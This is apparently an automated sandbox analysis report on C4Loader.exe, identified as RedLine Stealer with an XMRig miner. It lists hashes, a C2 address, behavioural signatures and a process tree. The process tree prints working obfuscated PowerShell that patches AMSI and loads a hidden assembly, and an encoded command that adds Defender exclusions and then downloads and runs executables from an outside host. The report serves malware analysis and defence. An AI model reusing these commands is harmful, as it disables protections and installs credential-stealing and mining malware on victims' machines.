Analysis
-
max time kernel
143s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
-
submitted
11-11-2022 23:23
General
-
Target
C4Loader.exe
-
Size
124KB
-
MD5
99f682f75994261bd769f11cd33820e7
-
SHA1
2d8f77e1aebc274f94c56626fe1a71514c01b439
-
SHA256
84374cb55c56fb530ef4f83f655ffeb7463e8c0452d7f13d57535d9e032e761f
-
SHA512
00ca067af16d76cd5e344065c3f6c223a5e35bf79b67759bfed26e1994bcbe36ca0ff0cfc10c4175659813a1501d8e5d9d64fbcaf98d92459ca052f15ff0f0db
-
SSDEEP
3072:x8Bwf9nPJ6+qVDRhIJTz7y1bJs6Httemsk3QnDPofdc:x8Snh2RIEJsKetudc
Score
10/10
Malware Config
Extracted
Family
redline
Botnet
1
C2
107.182.129.73:21733
Attributes
-
auth_value
3a5bb0917495b4312d052a0b8977d2bb
Signatures
-
Modifies security service 2 TTPs 5 IoCs
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 17 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 30 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
XMRig Miner payload 2 IoCs
-
Blocklisted process makes network request 1 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
-
Executes dropped EXE 6 IoCs
-
Stops running service(s) 3 TTPs
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Uses the VBS compiler for execution 1 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 9 IoCs
-
Suspicious use of SetThreadContext 6 IoCs
-
Drops file in Program Files directory 4 IoCs
-
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Program crash 21 IoCs
-
Checks processor information in registry 2 TTPs 48 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 32 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of UnmapMainImage 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{1ee42a25-dfb2-4380-9e6d-c30f0e6a2b42}2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:MfWwFyyyKWiB{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$zHZibhuwBaEAeD,[Parameter(Position=1)][Type]$DrVFYBiSlv)$HTRYDBaviaf=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+'f'+'l'+[Char](101)+'c'+'t'+''+[Char](101)+''+[Char](100)+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+[Char](101)+''+'m'+''+'o'+''+'r'+''+[Char](121)+''+'M'+''+'o'+'d'+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+[Char](101)+''+'l'+'e'+'g'+''+'a'+'t'+[Char](101)+''+'T'+''+[Char](121)+'p'+[Char](101)+'',''+[Char](67)+''+'l'+''+[Char](97)+'ss,'+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+'e'+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+'A'+''+[Char](110)+'s'+[Char](105)+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+','+[Char](65)+'ut'+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$HTRYDBaviaf.DefineConstructor('R'+'T'+''+[Char](83)+''+[Char](112)+'e'+[Char](99)+''+'i'+''+[Char](97)+'l'+[Char](78)+''+[Char](97)+''+'m'+'e'+','+''+[Char](72)+''+[Char](105)+''+'d'+'eBy'+[Char](83)+'ig'+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+'li'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$zHZibhuwBaEAeD).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+','+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+'ed');$HTRYDBaviaf.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+'o'+'k'+''+[Char](101)+'',''+[Char](80)+''+'u'+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+','+[Char](72)+''+[Char](105)+'d'+[Char](101)+'B'+[Char](121)+''+[Char](83)+''+'i'+''+'g'+',N'+[Char](101)+''+'w'+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+'V'+''+'i'+''+[Char](114)+''+'t'+''+[Char](117)+'a'+[Char](108)+'',$DrVFYBiSlv,$zHZibhuwBaEAeD).SetImplementationFlags('Ru'+'n'+'ti'+[Char](109)+'e'+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+'e'+'d');Write-Output $HTRYDBaviaf.CreateType();}$ATCLPXScUcuCY=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+'s'+''+'t'+''+'e'+''+'m'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType('M'+'i'+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+[Char](115)+'o'+'f'+'t'+[Char](46)+'W'+[Char](105)+''+'n'+'3'+'2'+''+[Char](46)+''+[Char](85)+'n'+'s'+''+[Char](97)+'f'+[Char](101)+''+[Char](65)+'TC'+[Char](76)+''+'P'+''+[Char](88)+''+'S'+''+[Char](99)+'Uc'+'u'+''+'C'+''+[Char](89)+'');$vZpdetnudMNGIS=$ATCLPXScUcuCY.GetMethod('v'+[Char](90)+''+[Char](112)+'d'+[Char](101)+'t'+[Char](110)+''+[Char](117)+'d'+[Char](77)+''+[Char](78)+''+[Char](71)+'I'+[Char](83)+'',[Reflection.BindingFlags]''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+','+''+[Char](83)+'t'+[Char](97)+''+'t'+''+'i'+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ONfjLIxNYCQvdjmfMyh=MfWwFyyyKWiB @([String])([IntPtr]);$wPDHzRhmTxOjZvPvlSmNOp=MfWwFyyyKWiB @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$bgtgIQDTfJl=$ATCLPXScUcuCY.GetMethod('GetM'+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+'eH'+[Char](97)+''+[Char](110)+''+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object]('kerne'+[Char](108)+''+'3'+''+[Char](50)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')));$MScikjDwUpGxHU=$vZpdetnudMNGIS.Invoke($Null,@([Object]$bgtgIQDTfJl,[Object]('L'+'o'+''+'a'+'d'+[Char](76)+''+[Char](105)+''+[Char](98)+'r'+[Char](97)+'r'+[Char](121)+''+'A'+'')));$VYKtGGiOLBdskzvmU=$vZpdetnudMNGIS.Invoke($Null,@([Object]$bgtgIQDTfJl,[Object](''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+'u'+[Char](97)+'l'+[Char](80)+'r'+[Char](111)+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+'t'+'')));$qGjBlxM=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MScikjDwUpGxHU,$ONfjLIxNYCQvdjmfMyh).Invoke(''+'a'+''+'m'+'s'+'i'+''+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'');$oefKZObKxwRpdDMyV=$vZpdetnudMNGIS.Invoke($Null,@([Object]$qGjBlxM,[Object](''+[Char](65)+'m'+[Char](115)+''+[Char](105)+''+[Char](83)+''+'c'+''+'a'+'n'+'B'+''+'u'+''+'f'+''+[Char](102)+''+'e'+'r')));$MVPwtBqZAP=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VYKtGGiOLBdskzvmU,$wPDHzRhmTxOjZvPvlSmNOp).Invoke($oefKZObKxwRpdDMyV,[uint32]8,4,[ref]$MVPwtBqZAP);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$oefKZObKxwRpdDMyV,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VYKtGGiOLBdskzvmU,$wPDHzRhmTxOjZvPvlSmNOp).Invoke($oefKZObKxwRpdDMyV,[uint32]8,0x20,[ref]$MVPwtBqZAP);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+'T'+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](100)+''+[Char](105)+''+'a'+''+[Char](108)+'e'+[Char](114)+''+[Char](115)+''+[Char](116)+''+'a'+'ger')).EntryPoint.Invoke($Null,$Null)2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:HOEaShOrllle{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$bUdTXrDhNjcZSb,[Parameter(Position=1)][Type]$RhjoWytnXi)$dSDXjVHeSYI=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+'fl'+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+''+'d'+''+'D'+''+'e'+'le'+[Char](103)+'a'+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+[Char](77)+''+[Char](101)+'m'+[Char](111)+'r'+[Char](121)+''+[Char](77)+''+'o'+'du'+'l'+'e',$False).DefineType(''+[Char](77)+''+'y'+''+'D'+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+''+[Char](84)+''+[Char](121)+'p'+[Char](101)+'','Cl'+[Char](97)+''+[Char](115)+'s'+','+''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+'c,'+[Char](83)+''+'e'+''+[Char](97)+''+[Char](108)+'e'+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+'s'+'i'+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+','+[Char](65)+'u'+[Char](116)+'o'+[Char](67)+'l'+'a'+'s'+[Char](115)+'',[MulticastDelegate]);$dSDXjVHeSYI.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+[Char](112)+''+'e'+''+'c'+''+[Char](105)+'al'+[Char](78)+''+[Char](97)+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+'e'+[Char](66)+''+'y'+''+[Char](83)+''+'i'+''+[Char](103)+',P'+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$bUdTXrDhNjcZSb).SetImplementationFlags(''+'R'+''+'u'+'n'+[Char](116)+''+[Char](105)+'me'+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+'ag'+'e'+''+[Char](100)+'');$dSDXjVHeSYI.DefineMethod(''+'I'+''+'n'+''+'v'+''+[Char](111)+''+[Char](107)+''+'e'+'','P'+[Char](117)+'b'+'l'+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+''+[Char](121)+'S'+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+'S'+''+[Char](108)+'o'+'t'+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+'u'+[Char](97)+''+[Char](108)+'',$RhjoWytnXi,$bUdTXrDhNjcZSb).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+[Char](116)+''+'i'+''+'m'+''+[Char](101)+','+'M'+''+[Char](97)+'nage'+'d'+'');Write-Output $dSDXjVHeSYI.CreateType();}$VGylFQOdagDXx=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'ys'+[Char](116)+''+'e'+''+[Char](109)+'.'+[Char](100)+'l'+'l'+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+'r'+'oso'+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+'in3'+[Char](50)+''+'.'+''+[Char](85)+''+[Char](110)+''+'s'+'a'+'f'+''+'e'+''+'V'+''+'G'+''+'y'+''+[Char](108)+''+[Char](70)+''+'Q'+''+[Char](79)+''+[Char](100)+''+[Char](97)+''+'g'+'D'+'X'+'x');$sDHxRSkkYBnzNo=$VGylFQOdagDXx.GetMethod(''+[Char](115)+''+[Char](68)+''+[Char](72)+''+[Char](120)+''+'R'+''+'S'+''+[Char](107)+''+[Char](107)+''+'Y'+''+'B'+''+[Char](110)+''+'z'+'N'+'o'+'',[Reflection.BindingFlags]''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+','+[Char](83)+''+[Char](116)+''+[Char](97)+'t'+[Char](105)+'c',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$MmwzXVMtnPJtfuTpksy=HOEaShOrllle @([String])([IntPtr]);$NyJhiuAsSxXCPZFgtuiNXe=HOEaShOrllle @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$xqHvnoJMKfY=$VGylFQOdagDXx.GetMethod(''+[Char](71)+''+'e'+''+'t'+'Mo'+[Char](100)+''+'u'+'l'+[Char](101)+''+[Char](72)+''+'a'+''+[Char](110)+''+[Char](100)+'l'+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'r'+[Char](110)+''+[Char](101)+'l'+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+'l'+'l'+'')));$SHEEDTKkWSUJiu=$sDHxRSkkYBnzNo.Invoke($Null,@([Object]$xqHvnoJMKfY,[Object](''+[Char](76)+''+'o'+''+[Char](97)+''+[Char](100)+'Li'+'b'+''+'r'+''+'a'+'r'+[Char](121)+''+[Char](65)+'')));$GUhFGZTdkenyupiop=$sDHxRSkkYBnzNo.Invoke($Null,@([Object]$xqHvnoJMKfY,[Object](''+[Char](86)+''+'i'+'r'+[Char](116)+''+'u'+''+[Char](97)+'lP'+'r'+''+[Char](111)+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$aqienkl=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SHEEDTKkWSUJiu,$MmwzXVMtnPJtfuTpksy).Invoke(''+[Char](97)+'ms'+[Char](105)+''+'.'+'d'+'l'+''+[Char](108)+'');$LcEyhilKAAGxfQDWm=$sDHxRSkkYBnzNo.Invoke($Null,@([Object]$aqienkl,[Object](''+'A'+''+[Char](109)+''+'s'+''+'i'+''+[Char](83)+'c'+[Char](97)+''+'n'+''+[Char](66)+'u'+[Char](102)+''+'f'+''+[Char](101)+''+[Char](114)+'')));$dGjmnDDzeS=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GUhFGZTdkenyupiop,$NyJhiuAsSxXCPZFgtuiNXe).Invoke($LcEyhilKAAGxfQDWm,[uint32]8,4,[ref]$dGjmnDDzeS);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$LcEyhilKAAGxfQDWm,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GUhFGZTdkenyupiop,$NyJhiuAsSxXCPZFgtuiNXe).Invoke($LcEyhilKAAGxfQDWm,[uint32]8,0x20,[ref]$dGjmnDDzeS);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+''+'T'+''+'W'+'A'+[Char](82)+''+[Char](69)+'').GetValue(''+'d'+''+[Char](105)+''+'a'+''+[Char](108)+'e'+[Char](114)+'s'+'t'+'a'+'g'+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe"C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exeC:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe2⤵
- Executes dropped EXE
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s FontCache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Suspicious use of UnmapMainImage
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcgBwACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAagBnAHQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaQBiAG4AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbQBlAHAAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBkAGQAbgBzAC4AbgBlAHQALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBDADQATABvAGEAZABlAHIALgBlAHgAZQAnACwAIAA8ACMAZQB0AHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBlAHkAagAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBtAGcAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBDADQATABvAGEAZABlAHIALgBlAHgAZQAnACkAKQA8ACMAZQB0AHMAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBvAG4AbgBlAGMAdAAyAG0AZQAuAGQAZABuAHMALgBuAGUAdAAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAG4AZQB3ADIALgBlAHgAZQAnACwAIAA8ACMAcgBiAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBoAHAAZQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBsAGUAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBuAGUAdwAyAC4AZQB4AGUAJwApACkAPAAjAGYAaAB1ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBkAGQAbgBzAC4AbgBlAHQALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBsAHAAcQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHkAcwBjACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAbQB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAG4AdABrACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBkAGQAbgBzAC4AbgBlAHQALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAG0AYQByAHQARABlAGYAUgB1AG4ALgBlAHgAZQAnACwAIAA8ACMAegB6AGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB5AGgAbAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBtAHgAcgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAG0AYQByAHQARABlAGYAUgB1AG4ALgBlAHgAZQAnACkAKQA8ACMAcQB4AHoAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAagB0AG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAYwBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQA8ACMAaABxAGgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYwBnAGEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGIAawB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAG4AZQB3ADIALgBlAHgAZQAnACkAPAAjAGsAcgBwACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHYAbQByACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBhAHgAagAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAHkAcwBBAHAAcAAuAGUAeABlACcAKQA8ACMAZgBiAGIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdABmAG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAaQB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQA8ACMAYgBwAHMAIwA+AA=="4⤵
